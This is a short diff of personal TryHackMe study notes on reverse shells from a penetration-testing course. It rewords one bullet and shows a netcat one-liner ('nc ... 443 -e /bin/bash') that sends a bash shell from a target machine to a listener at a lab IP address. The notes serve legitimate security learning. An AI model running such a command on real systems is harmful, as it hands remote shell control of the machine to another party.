clydebuilt1974/TryHackMe/Junior Penetration Tester/Privilege Escalation/What the Shell.md

 ```
 * Send a reverse shell from the target.
   * Connection is sent *from* the target.
-  * This is likely to be done through code injection.
+  * This is likely done through code injection.
 ```
 shell@linux-shell-practice:~$ nc 10.11.12.223 443 -e /bin/bash
 ```